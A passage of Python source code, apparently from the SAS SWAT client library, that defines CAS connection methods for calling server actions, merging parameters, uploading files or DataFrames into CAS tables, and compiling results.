The name of the CAS action set to look for.
Returns
-------
:class:`CASActionSet` object
'''
return self.__getattr__(name, atype='actionset')
def __dir__(self):
# Short-circuit PyCharm's introspection
if 'get_names' in [x[3] for x in inspect.stack()]:
return list(self._dir)
return list(sorted(list(self._dir) + list(self.get_action_names())))
def __dir_actions__(self):
return list(sorted(self.get_action_names()))
def __dir_members__(self):
return list(sorted(self._dir))
def __str__(self):
args = []
args.append(repr(self._hostname))
args.append(repr(self._port))
if self._username:
args.append(repr(self._username))
return 'CAS(%s, protocol=%s, name=%s, session=%s)' % (', '.join(args),
repr(self._protocol),
repr(self._name),
repr(self._session))
def __repr__(self):
return str(self)
def CASTable(self, name, **kwargs):
'''
Create a CASTable instance
The primary difference between constructing a :class:`CASTable`
object through this method rather than directly, is that the
current session will be automatically registered with the
:class:`CASTable` object so that CAS actions can be called on
it directly.
Parameters
----------
name : string
Name of the table in CAS.
**kwargs : any, optional
Arbitrary keyword arguments. These keyword arguments are
passed to the :class:`CASTable` constructor.
Returns
-------
:class:`CASTable` object
'''
table = CASTable(name, **kwargs)
table.set_connection(self)
return table
def SASFormatter(self):
'''
Create a SASFormatter instance
:class:`SASFormatters` can be used to format Python values using
SAS data formats.
Returns
-------
:class:`SASFormatter` object
'''
return SASFormatter(soptions=self._soptions)
def add_results_hook(self, name, func):
'''
Add a post-processing function for results
The function will be called with two arguments: the CAS connection
object and the :class:`CASResult` object.
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
Function to call for result set
See Also
--------
:meth:`del_results_hook`
:meth:`del_results_hooks`
Examples
--------
To add a post-processing function for a particular action, you
specify the fully-qualified action name and a function.
>>> def myfunc(connection, results):
if results and results.get('num'):
results['num'] = math.abs(results['num'])
return results
>>>
>>> s.add_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name not in self._results_hooks:
self._results_hooks[name] = []
self._results_hooks[name].append(func)
def del_results_hook(self, name, func):
'''
Delete a post-processing function for an action
Parameters
----------
name : string
Full name of action (actionset.actionname)
func : function
The function to remove
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hooks`
Examples
--------
To remove a post-processing hook from an action, you must specify the
action name as well as the function to remove. This is due to the fact
that multiple functions can be registered to a particular action.
>>> s.del_results_hook('myactionset.myaction', myfunc)
'''
name = name.lower()
if name in self._results_hooks:
self._results_hooks[name] = [x for x in self._results_hooks[name]
if x is not func]
def del_results_hooks(self, name):
'''
Delete all post-processing functions for an action
Parameters
---------
name : string
Full name of action (actionset.actionname)
See Also
--------
:meth:`add_results_hook`
:meth:`del_results_hook`
Examples
--------
The following code removes all post-processing functions registered to
the `myactionset.myaction` action.
>>> s.del_results_hooks('myactionset.myaction')
'''
name = name.lower()
if name in self._results_hooks:
del self._results_hooks[name]
def close(self, close_session=False):
''' Close the CAS connection '''
if close_session:
self.retrieve('session.endsession', _messagelevel='error', _apptag='UI')
errorcheck(self._sw_connection.close(), self._sw_connection)
def terminate(self):
''' End the session and close the CAS connection '''
self.close(close_session=True)
def _set_option(self, **kwargs):
'''
Set connection options
Parameters
---------
**kwargs : any
Arbitrary keyword arguments. Each key/value pair will be
set as a connection option.
Returns
-------
True
If all options were set successfully
'''
for name, value in six.iteritems(kwargs):
name = str(name)
typ = errorcheck(self._sw_connection.getOptionType(name),
self._sw_connection)
try:
if typ == 'boolean':
if value in [True, False, 1, 0]:
errorcheck(self._sw_connection.setBooleanOption(name,
value and 1 or 0),
self._sw_connection)
else:
raise SWATError('%s is not a valid boolean value' % value)
elif typ == 'string':
if isinstance(value, (binary_types, text_types)):
errorcheck(self._sw_connection.setStringOption(name, a2n(value)),
self._sw_connection)
else:
errorcheck(self._sw_connection.setStringOption(name, value),
self._sw_connection)
elif typ == 'int32':
errorcheck(self._sw_connection.setInt32Option(name, int32(value)),
self._sw_connection)
elif typ == 'int64':
errorcheck(self._sw_connection.setInt64Option(name, int64(value)),
self._sw_connection)
elif typ == 'double':
errorcheck(self._sw_connection.setDoubleOption(name, float64(value)),
self._sw_connection)
except TypeError:
raise SWATError('%s is not the correct type' % value)
return True
def copy(self):
'''
Create a copy of the connection
The copy of the connection will use the same parameters as ``self``,
but it will create a new session.
Examples
--------
>>> conn = swat.CAS()
>>> print(conn)
CAS(..., session='76dd2bbe-de65-554f-a94f-a5e0e1abfdc8')
>>> conn2 = conn.copy()
>>> print(conn2)
CAS(..., session='19cef586-6997-ae40-b62c-036f44cb60fc')
See Also
--------
:meth:`fork`
Returns
-------
:class:`CAS` object
'''
return type(self)(None, None, prototype=self)
def fork(self, num=2):
'''
Create multiple copies of a connection
The copies of the connection will use the same parameters as ``self``,
but each will create a new session.
Notes
-----
The first element in the returned list is the same object that
the method was called on. You only get `num`-1 copies.
Parameters
----------
num : int, optional
Number of returned connections. The first element of the returned
list is always the object that the fork method was called on.
Examples
--------
The code below demonstrates how to get four unique connections.
>>> conn = swat.CAS()
>>> c1, c2, c3, c4 = conn.fork(4)
>>> c1 is conn
True
>>> c2 is conn
False
See Also
--------
:meth:`copy`
Returns
-------
list of :class:`CAS` objects
'''
output = [self]
for i in range(1, num):
output.append(self.copy())
return output
def _invoke_without_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
:obj:`self`
'''
if isinstance(self._sw_connection, rest.REST_CASConnection):
errorcheck(self._sw_connection.invoke(a2n(_name_), kwargs),
self._sw_connection)
else:
errorcheck(self._sw_connection.invoke(a2n(_name_),
py2cas(self._soptions,
self._sw_error, **kwargs)),
self._sw_connection)
return self
def _merge_param_args(self, parmlist, kwargs, action=None):
'''
Merge keyword arguments into a parmlist
This method modifies the parmlist *in place*.
Parameters
----------
parmlist : list
Parameter list.
kwargs : dict
Dictionary of keyword arguments.
action : string
Name of the action.
'''
if action is None:
action = ''
if isinstance(kwargs, ParamManager):
kwargs = copy.deepcopy(kwargs.params)
# Short circuit if we can
if not isinstance(kwargs, dict):
return
# See if we have a caslib= parameter
caslib = False
for param in parmlist:
if param['name'] == 'caslib':
caslib = True
break
# kwargs preserving case
casekeys = {k.lower(): k for k in kwargs.keys()}
# Add support for CASTable objects
inputs = None
fetch = {}
uses_inputs = False
uses_fetchvars = False
for param in parmlist:
ptype = param['parmType']
key = param['name']
key = casekeys.get(key, key)
key_lower = key.lower()
# Check for inputs= / fetchvars= parameters
if ptype == 'value_list':
if key_lower == 'inputs':
uses_inputs = True
elif key_lower == 'fetchvars':
uses_fetchvars = True
# Get table object if it exists
tbl = kwargs.get('__table__', None)
# Convert table objects to the proper form based on the argument type
if key in kwargs and isinstance(kwargs[key], CASTable):
if param.get('isTableDef'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
kwargs[key] = kwargs[key].to_table_params()
elif param.get('isTableName'):
inputs = kwargs[key].get_inputs_param()
fetch = kwargs[key].get_fetch_params()
# Fill in caslib= first
if caslib and 'caslib' not in kwargs and \
kwargs[key].has_param('caslib'):
kwargs['caslib'] = kwargs[key].get_param('caslib')
kwargs[key] = kwargs[key].to_table_name()
elif param.get('isOutTableDef'):
kwargs[key] = kwargs[key].to_outtable_params()
elif param.get('isCasLib') and kwargs[key].has_param('caslib'):
kwargs[key] = kwargs[key].get_param('caslib')
# If a string is given for a table object, convert it to a table object
elif key in kwargs and isinstance(kwargs[key], text_types) and \
param.get('isTableDef'):
kwargs[key] = {'name': kwargs[key]}
elif tbl is not None and param.get('isTableDef') and \
key_lower == 'table' and 'table' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
kwargs[key] = tbl.to_table_params()
elif tbl is not None and param.get('isTableName') and \
key_lower == 'name' and 'name' not in casekeys:
inputs = tbl.get_inputs_param()
fetch = tbl.get_fetch_params()
if caslib and 'caslib' not in kwargs and tbl.has_param('caslib'):
kwargs['caslib'] = tbl.get_param('caslib')
kwargs[key] = tbl.to_table_name()
# Workaround for columninfo / update which doesn't define table= as
# a table definition.
elif tbl is not None and key_lower == 'table' and \
action.lower() in ['columninfo', 'table.columninfo',
'update', 'table.update'] and \
'table' not in casekeys:
inputs = tbl.get_inputs_param()
kwargs[key] = tbl.to_table_params()
if not uses_inputs:
if inputs and 'vars' not in kwargs:
kwargs[key]['vars'] = inputs
inputs = None
# Apply input variables
if uses_inputs and inputs and 'inputs' not in kwargs:
kwargs['inputs'] = inputs
elif uses_fetchvars and inputs and 'fetchvars' not in kwargs:
kwargs['fetchvars'] = inputs
# Apply fetch parameters
if fetch and action.lower() in ['fetch', 'table.fetch']:
for key, value in fetch.items():
if key in kwargs:
continue
if key == 'sortby' and ('orderby' in kwargs or 'orderBy' in kwargs):
continue
kwargs[key] = value
# Apply inputs= to specific actions that don't support it
if 'table' in kwargs and not uses_inputs and inputs \
and action.lower() in ['partition', 'table.partition',
'save', 'table.save']:
tbl = kwargs['table']
if not isinstance(tbl, dict):
tbl = dict(name=tbl)
tbl['vars'] = inputs
# Fix aggregate action when both inputs= and varspecs= are supplied
if 'table' in kwargs and action.lower() in ['aggregate', 'aggregation.aggregate']:
if 'inputs' in kwargs and 'varspecs' in kwargs:
kwargs.pop('inputs', None)
kwargs.pop('__table__', None)
# Workaround for tableinfo which aliases table= to name=, but
# the alias is hidden.
if action.lower() in ['tableinfo', 'table.tableinfo'] and 'table' in kwargs:
if isinstance(kwargs['table'], CASTable):
kwargs['table'] = kwargs['table'].to_table_params()
if isinstance(kwargs['table'], dict):
if caslib and 'caslib' not in kwargs and kwargs['table'].get('caslib'):
kwargs['caslib'] = kwargs['table']['caslib']
kwargs['table'] = kwargs['table']['name']
# Add current value fields in the signature
for param in parmlist:
if param['name'] in kwargs:
if 'parmList' in param:
self._merge_param_args(param['parmList'], kwargs[param['name']],
action=action)
else:
if isinstance(kwargs[param['name']], text_types):
param['value'] = kwargs[param['name']].replace('"', '\\u0022')
# TODO: This should only happen for binary inputs (i.e., never)
elif isinstance(kwargs[param['name']], binary_types):
# param['value'] = kwargs[param['name']].replace('"', '\\u0022')
pass
else:
param['value'] = kwargs[param['name']]
def _get_action_params(self, name, kwargs):
'''
Get additional parameters associated with the given action
Parameters
----------
name : string
Name of the action being executed.
kwargs : dict
Action parameter dictionary.
Returns
-------
dict
The new set of action parameters.
'''
newkwargs = kwargs.copy()
for value in six.itervalues(kwargs):
if isinstance(value, ActionParamManager):
newkwargs.update(value.get_action_params(name, {}))
return newkwargs
def _invoke_with_signature(self, _name_, **kwargs):
'''
Call an action on the server
Parameters
----------
_name_ : string
Name of the action.
**kwargs : any, optional
Arbitrary keyword arguments.
Returns
-------
dict
Signature of the action
'''
# Get the signature of the action
signature = self._get_action_info(_name_)[-1]
# Check for additional action parameters
kwargs = self._get_action_params(_name_, kwargs)
if signature:
signature = copy.deepcopy(signature)
kwargs = copy.deepcopy(kwargs)
self._merge_param_args(signature.get('params', {}), kwargs, action=_name_)
self._invoke_without_signature(_name_, **kwargs)
return signature
def _extract_dtypes(self, df):
'''
Extract importoptions= style data types from the DataFrame
Parameters
----------
df : pandas.DataFrame
The DataFrame to get types from
format : string, optional
The output format: dict or list
Returns
-------
OrderedDict
'''
out = collections.OrderedDict()
for key, value in df.dtypes.iteritems():
value = value.name
if value == 'object':
value = 'varchar'
elif value.startswith('float'):
value = 'double'
elif value.endswith('int64'):
if 'csv-ints' in self.server_features:
value = 'int64'
else:
value = 'double'
elif value.startswith('int'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('bool'):
if 'csv-ints' in self.server_features:
value = 'int32'
else:
value = 'double'
elif value.startswith('datetime'):
value = 'varchar'
else:
continue
out['%s' % key] = dict(type=value)
return out
def _apply_importoptions_vars(self, importoptions, df_dtypes):
'''
Merge in vars= parameters to importoptions=
Notes
-----
This method modifies the importoptions in-place.
Parameters
----------
importoptions : dict
The importoptions= parameter
df_dtypes : dict or list
The DataFrame data types dictionary
'''
if 'vars' not in importoptions:
importoptions['vars'] = df_dtypes
return
vars = importoptions['vars']
# Merge options into dict vars
if isinstance(vars, dict_types):
for key, value in six.iteritems(df_dtypes):
if key in vars:
for k, v in six.iteritems(value):
vars[key].setdefault(k, v)
else:
vars[key] = value
# Merge options into list vars
else:
df_dtypes_list = []
for key, value in six.iteritems(df_dtypes):
value = dict(value)
value['name'] = key
df_dtypes_list.append(value)
for i, item in enumerate(df_dtypes_list):
if i < len(vars):
if not vars[i]:
vars[i] = item
else:
for key, value in six.iteritems(item):
vars[i].setdefault(key, value)
else:
vars.append(item)
def upload(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload data from a local file into a CAS table
The primary difference between this data loader and the other data
loaders on this class is that, in this case, the parsing of the data
is done on the server. This method simply uploads the file as
binary data which is then parsed by `table.loadtable` on the server.
While the server parsers may not be quite a flexible as Python, they
are generally much faster. Files such as CSV can be parsed on the
server in multiple threads across many machines in the grid.
Notes
-----
This method uses paths that are on the **client side**. This means
you need to use paths to files that are **on the same machine that Python
is running on**. If you want to load files from the CAS server side, you
would use the `table.loadtable` action.
Also, when uploading a :class:`pandas.DataFrame`, the data is exported to
a CSV file, then the CSV file is uploaded. This can cause a loss of
metadata about the columns since the server parser will guess at the
data types of the columns. You can use `importoptions=` to specify more
information about the data.
Parameters
----------
data : string or :class:`pandas.DataFrame`
If the value is a string, it can be either a filename
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Examples
--------
>>> conn = swat.CAS()
>>> out = conn.upload('data/iris.csv')
>>> tbl = out.casTable
>>> print(tbl.head())
sepal_length sepal_width petal_length petal_width species
0 5.1 3.5 1.4 0.2 setosa
1 4.9 3.0 1.4 0.2 setosa
2 4.7 3.2 1.3 0.2 setosa
3 4.6 3.1 1.5 0.2 setosa
4 5.0 3.6 1.4 0.2 setosa
Returns
-------
:class:`CASResults`
'''
delete = False
name = None
df_dtypes = None
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
if importoptions is None:
importoptions = {}
import pandas as pd
if isinstance(data, pd.DataFrame):
import tempfile
with tempfile.NamedTemporaryFile(delete=False, suffix='.csv') as tmp:
delete = True
filename = tmp.name
name = os.path.splitext(os.path.basename(filename))[0]
data.to_csv(filename, encoding='utf-8',
index=False, sep=a2n(',', 'utf-8'),
decimal=a2n('.', 'utf-8'),
line_terminator=a2n('\r\n', 'utf-8'))
df_dtypes = self._extract_dtypes(data)
importoptions['locale'] = 'EN-us'
elif data.startswith('http://') or \
data.startswith('https://') or \
data.startswith('ftp://'):
import certifi
import ssl
import tempfile
from six.moves.urllib.request import urlopen
from six.moves.urllib.parse import urlparse
parts = urlparse(data)
ext = os.path.splitext(parts.path)[-1].lower()
with tempfile.NamedTemporaryFile(delete=False, suffix=ext) as tmp:
delete = True
tmp.write(
urlopen(
data,
context=ssl.create_default_context(cafile=certifi.where())
).read())
filename = tmp.name
if parts.path:
name = os.path.splitext(parts.path.split('/')[-1])[0]
else:
name = os.path.splitext(os.path.basename(filename))[0]
else:
filename = data
name = os.path.splitext(os.path.basename(filename))[0]
# TODO: Populate docstring with table.loadtable action help
filetype = {
'sav': 'spss',
'xlsx': 'excel',
'sashdat': 'hdat',
'sas7bdat': 'basesas',
}
if isinstance(importoptions, (dict, ParamManager)) and \
'filetype' not in [x.lower() for x in importoptions.keys()]:
ext = os.path.splitext(filename)[-1][1:].lower()
if ext in filetype:
importoptions['filetype'] = filetype[ext]
elif len(ext) == 3 and ext.endswith('sv'):
importoptions['filetype'] = 'csv'
kwargs['importoptions'] = importoptions
if df_dtypes:
self._apply_importoptions_vars(importoptions, df_dtypes)
if casout is None:
casout = {}
if isinstance(casout, CASTable):
casout = casout.to_outtable_params()
if isinstance(casout, dict) and 'name' not in casout:
casout['name'] = name
kwargs['casout'] = casout
if isinstance(self._sw_connection, rest.REST_CASConnection):
resp = self._sw_connection.upload(a2n(filename), kwargs)
else:
resp = errorcheck(self._sw_connection.upload(a2n(filename),
py2cas(self._soptions,
self._sw_error,
**kwargs)),
self._sw_connection)
# Remove temporary file as needed
if delete:
try:
os.remove(filename)
except Exception:
pass
return self._get_results([(CASResponse(resp, connection=self), self)])
def upload_file(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : string
Either a filename or URL.
or a URL. DataFrames will be converted to CSV before
uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def upload_frame(self, data, importoptions=None, casout=None, **kwargs):
'''
Upload a client-side data file to CAS and parse it into a CAS table
Parameters
----------
data : :class:`pandas.DataFrame`
DataFrames will be converted to CSV before uploading.
importoptions : dict, optional
Import options for the ``table.loadtable`` action.
casout : dict, optional
Output table definition for the ``table.loadtable`` action.
**kwargs : keyword arguments, optional
Additional parameters to the ``table.loadtable`` action.
Returns
-------
:class:`CASTable`
'''
for key, value in list(kwargs.items()):
if importoptions is None and key.lower() == 'importoptions':
importoptions = value
del kwargs[key]
elif casout is None and key.lower() == 'casout':
casout = value
del kwargs[key]
out = self.upload(data, importoptions=importoptions,
casout=casout, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return out['casTable']
def _raw_invoke(self, _name_, **kwargs):
''' Invoke a CAS action without any parameter checking '''
self._invoke_without_signature(a2n(_name_), **kwargs)
return self
def _raw_retrieve(self, _name_, **kwargs):
''' Call a CAS action without parameter checking and return results '''
try:
# Call the action and compile the results
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
except SWATCASActionRetry:
self._invoke_without_signature(a2n(_name_), **kwargs)
return self._get_results(getnext(self))
def invoke(self, _name_, **kwargs):
'''
Call an action on the server
The :meth:`invoke` method only calls the action on the server. It
does not retrieve the responses. To get the responses, you iterate
over the connection object.
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
`self`
See Also
--------
:meth:`retrieve` : Calls action and retrieves results
:meth:`__iter__` : Iterates over responses
Examples
--------
The code below demonstrates how you invoke an action on the server and
iterate through the results.
>>> s.invoke('help')
<swat.CAS object at 0x7fab0a9031d0>
>>> for response in s:
... for key, value in response:
... print(key)
... print(value)
builtins
name description
0 addnode Add a node to the server
1 help Lists the available actions
.
.
.
'''
self._invoke_with_signature(a2n(_name_), **kwargs)
return self
def retrieve(self, _name_, **kwargs):
'''
Call the action and aggregate the results
Parameters
----------
_name_ : string
Name of the action
**kwargs : any, optional
Arbitrary keyword arguments
Returns
-------
:class:`CASResults` object
See Also
--------
:meth:`invoke` : Calls action, but does not retrieve results
Examples
--------
The code below demonstrates how you invoke an action on the server and
retrieve the results.
>>> out = s.retrieve('help')
>>> print(out.keys())
['builtins', 'casidx', 'casmeta', 'espact', 'tkacon', 'table', 'tkcsessn',
'tkcstate']
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
Status and performance information is also available on the returned object.
Here is an example of an action call to an action that doesn't exist.
>>> out = s.retrieve('foo')
>>> print(out.status)
'The specified action was not found.'
>>> print(out.severity)
2
>>> print(out.messages)
["ERROR: Action 'foo' was not found.",
'ERROR: The CAS server stopped processing this action because of errors.']
Here is an example that demonstrates the performance metrics that are available.
>>> out = s.retrieve('help')
>>> print(out.performance)
<swat.CASPerformance object at 0x33b1c50>
Performance values are loaded lazily, but you can get a dictionary of
all of them using the ``to_dict`` method.
>>> print(out.performance.to_dict())
{'system_cores': 1152L, 'memory_quota': 303759360L, 'cpu_user_time': 0.014995,
'elapsed_time': 0.004200000000000001, 'system_nodes': 48L,
'memory_system': 432093312L, 'cpu_system_time': 0.018999, 'memory': 150688L,
'memory_os': 294322176L, 'system_total_memory': 4868538236928L}
Rather than having the ``retrieve`` method compile all of the results into one
object, you can control how the responses and results from the server are
handled in your own functions using the ``responsefunc`` or ``resultfunc`` keyword
arguments.
The ``responsefunc`` argument allows you to specify a function that is called for
each response from the server after the action is called. The ``resultfunc``
is called for each result in a response. These functions can not be used at the
same time though. In the case where both are specified, only the resultfunc
will be used. Below is an example of using a responsefunc function.
This function closely mimics what the `retrieve` method does by default.
>>> def myfunc(response, connection, userdata):
... if userdata is None:
... userdata = {}
... for key, value in response:
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', responsefunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
The same result can be gotten using the ``resultfunc`` option as well.
>>> def myfunc(key, value, response, connection, userdata):
... if userdata is None:
... userdata = {}
... userdata[key] = value
... return userdata
>>> out = s.retrieve('help', resultfunc=myfunc)
>>> print(out['builtins'])
name description
0 addnode Add a node to the server
1 help Lists the available actions
2 listnodes List the server nodes
.
.
.
'''
kwargs = dict(kwargs)
# Decode from JSON as needed
if '_json' in kwargs:
newargs = json.loads(kwargs['_json'])
newargs.update(kwargs)
del newargs['_json']
kwargs = newargs
datamsghandler = None
if 'datamsghandler' in kwargs:
datamsghandler = kwargs['datamsghandler']
kwargs.pop('datamsghandler')
if self._protocol.startswith('http'):
raise SWATError('Data message handlers are not supported '
'in the REST interface.')
# Response callback function
responsefunc = None
if 'responsefunc' in kwargs:
responsefunc = kwargs['responsefunc']
kwargs.pop('responsefunc')
# Result callback function
resultfunc = None
if 'resultfunc' in kwargs:
resultfunc = kwargs['resultfunc']
kwargs.pop('resultfunc')
try:
# Call the action and compile the results
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
except SWATCASActionRetry:
signature = self._invoke_with_signature(a2n(_name_), **kwargs)
results = self._get_results(getnext(self, datamsghandler=datamsghandler),
responsefunc=responsefunc, resultfunc=resultfunc)
# Return raw data if a function was supplied
if responsefunc is not None or resultfunc is not None:
return results
results.signature = signature
# run post-processing hooks
if signature and signature.get('name') in self._results_hooks:
for func in self._results_hooks[signature['name']]:
func(self, results)
return results
def _get_results(self, riter, responsefunc=None, resultfunc=None):
'''
Walk through responses in ``riter`` and compile results
Parameters
----------
riter : iterable
Typically a CAS object, but any iterable that returns a
response / connection pair for each iteration can be used.
responsefunc : callable, optional
Callback function that is called for each response
resultfunc : callable, optional
Callback function that is called for each result
Returns
-------
CASResults
If no callback functions were supplied.
any
If a callback function is supplied, the result of that function
is returned.
'''
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
resultdata = None
responsedata = None
try:
for response, conn in riter:
if response.disposition.status_code == RETRY_ACTION_CODE:
raise SWATCASActionRetry(response.disposition.status)
elif response.disposition.status_code == SESSION_ABORTED_CODE:
# Any new requests sent to the session will never return,
# so just close the connection now.
self.close()
raise SWATCASActionError(response.disposition.status, response, conn)
if responsefunc is not None:
responsedata = responsefunc(response, conn, responsedata)
continue
# Action was restarted by the server
if 'action-restart' in response.updateflags:
results = CASResults()
results.messages = messages = []
results.updateflags = updateflags = set()
results.session = self._session
results.sessionname = self._name
events = results.events
idx = 0
continue
# CASTable parameters
caslib = None
tablename = None
castable = None
for key, value in response:
if resultfunc is not None:
resultdata = resultfunc(key, value, response,
conn, resultdata)
continue
if key is None or isinstance(key, int_types):
results[idx] = value
idx += 1
else:
lowerkey = key.lower()
if lowerkey == 'tablename':
tablename = value
elif lowerkey == 'caslib':
caslib = value
elif lowerkey == 'castable':
castable = True
# Event results start with '$'
if key.startswith('$'):
events[key] = value
else:
results[key] = value
# Create a CASTable instance if all of the pieces are there
if caslib and tablename and not castable:
results['casTable'] = self.CASTable(tablename, caslib=caslib)
results.performance = response.performance
for key, value in six.iteritems(response.disposition.to_dict()):
setattr(results, key, value)
messages.extend(response.messages)
updateflags.update(response.updateflags)
except SWATCASActionError as err:
if responsefunc:
err.results = responsedata
elif resultfunc:
err.results = resultdata
else:
err.results = results
err.events = events
raise err
if responsefunc is not None:
return responsedata
if resultfunc is not None:
return resultdata
return results
def __getattr__(self, name, atype=None):
'''
Convenience method for getting a CASActionSet/CASAction as an attribute
When an attribute that looks like an action name is accessed, CAS
is queried to see if it is an action set or action name. If so,
the reflection information for the entire actionset is used to
generate classes for the actionset and all actions.
Parameters
----------
name : string
Action name or action set name
atype : string, optional
Type of item to search for exclusively ('actionset', 'action',
or 'action_class')
Returns
-------
CASAction
If `name` is an action name
CASActionSet
If `name` is an action set name
Raises
------
AttributeError
if `name` is neither an action name or action set name
'''
class_requested = False
origname = name
# Normalize name
if re.match(r'^[A-Z]', name):
class_requested = True
if atype is not None and atype == 'action_class':
class_requested = True
atype = 'action'
name = name.lower()
# Check cache for actionset and action classes
if (atype in [None, 'actionset'] and name in self._actionset_classes
and self._actionset_classes[name] is not None):
return self._actionset_classes[name]()
if (atype in [None, 'action'] and name in self._action_classes
and self._action_classes[name] is not None):
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
# See if the action/action set exists
asname, actname, asinfo = self._get_actionset_info(name.lower(), atype=atype)
# Generate a new actionset class
ascls = CASActionSet.from_reflection(asinfo, self)
# Add actionset and actions to the cache
self._actionset_classes[asname.lower()] = ascls
for key, value in six.iteritems(ascls.actions):
self._action_classes[key] = value
self._action_classes[asname.lower() + '.' + key] = value
# Check cache for actionset and action classes
if atype in [None, 'actionset'] and name in self._actionset_classes:
return self._actionset_classes[name]()
if atype in [None, 'action'] and name in self._action_classes:
if class_requested:
return self._action_classes[name]
return self._action_classes[name]()
raise AttributeError(origname)
def _get_action_info(self, name, showhidden=True):
'''
Get the reflection information for the given action name
Parameters
----------
name : string
Name of the action
showhidden : boolean
Should hidden actions be shown?
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-info-dict
'''
name = name.lower()
if name in self._action_info:
return self._action_info[name]
asname, actname, asinfo = self._get_reflection_info(name, showhidden=showhidden)
# If action name is None, it is the same as the action set name
if actname is None:
actname = asname
# Populate action set info while we're here
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info
actinfo = {}
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
if aname == actname.lower():
actinfo = item
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, actinfo
def _get_actionset_info(self, name, atype=None, showhidden=True):
'''
Get the reflection information for the given action set / action name
If the name is an action set, the returned action name will be None.
Parameters
----------
name : string
Name of the action set or action
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
Returns
-------
( string, string, dict )
Tuple containing action-set-name, action-name, and action-set-info-dict
'''
name = name.lower()
if atype in [None, 'actionset'] and name in self._actionset_info:
return self._actionset_info[name]
if atype in [None, 'action'] and name in self._action_info:
asname, aname, actinfo = self._action_info[name]
return asname, aname, self._actionset_info[asname.lower()][-1]
asname, actname, asinfo = self._get_reflection_info(name, atype=atype,
showhidden=showhidden)
# Populate action set info
self._actionset_info[asname.lower()] = asname, None, asinfo
# Populate action info while we're here
for item in asinfo.get('actions'):
asname, aname = item['name'].split('.', 1)
self._action_info[aname] = asname, aname, item
self._action_info[item['name']] = asname, aname, item
return asname, actname, asinfo
def _get_reflection_info(self, name, atype=None, showhidden=True):
'''
Get the full action name of the called action including the action set information
Parameters
----------
name : string
Name of the argument
atype : string, optional
Specifies the type of the name ('action' or 'actionset')
showhidden : boolean, optional
Should hidden actions be shown?
Returns
-------
tuple
( action set name, action name, action set reflection info )
'''
asname = None
actname = None
# See if the name is an action set name, action name, or nothing
if atype in [None, 'actionset']:
for response in self._invoke_without_signature('builtins.queryactionset',
actionset=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if value:
asname = name.lower()
break
if asname is None:
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.queryname',
name=name,
_messagelevel='error',
_apptag='UI'):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
asname = out.get('actionSet')
actname = out.get('action')
# We can't have both in the same namespace, action set name wins
if asname == actname:
actname = None
# If we have an action set name, reflect it
if asname:
asname = asname.lower()
query = {'showhidden': showhidden, 'actionset': asname}
if not get_option('interactive_mode'):
query['showlabels'] = False
idx = 0
out = {}
for response in self._invoke_without_signature('builtins.reflect',
_messagelevel='error',
_apptag='UI', **query):
for key, value in response:
if key is None or isinstance(key, int_types):
out[idx] = value
idx += 1
else:
out[key] = value
# Normalize the output
asinfo = _lower_actionset_keys(out[0])
for act in asinfo.get('actions'):
act['name'] = (asname + '.' + act['name']).lower()
return asname, actname, asinfo
raise AttributeError(name)
def __iter__(self):
'''
Iterate over responses from CAS
If you used the :meth:`invoke` method to call a CAS action, the
responses from the server are not automatically retrieved. You
will need to pull them down manually. Iterating over the CAS
connection object after calling :meth:`invoke` will pull responses
down until they have been exhausted.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> for resp in conn:
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`invoke` : Calls a CAS action without retrieving results
:meth:`retrieve` : Calls a CAS action and retrieves results
Yields
------
:class:`CASResponse` object
'''
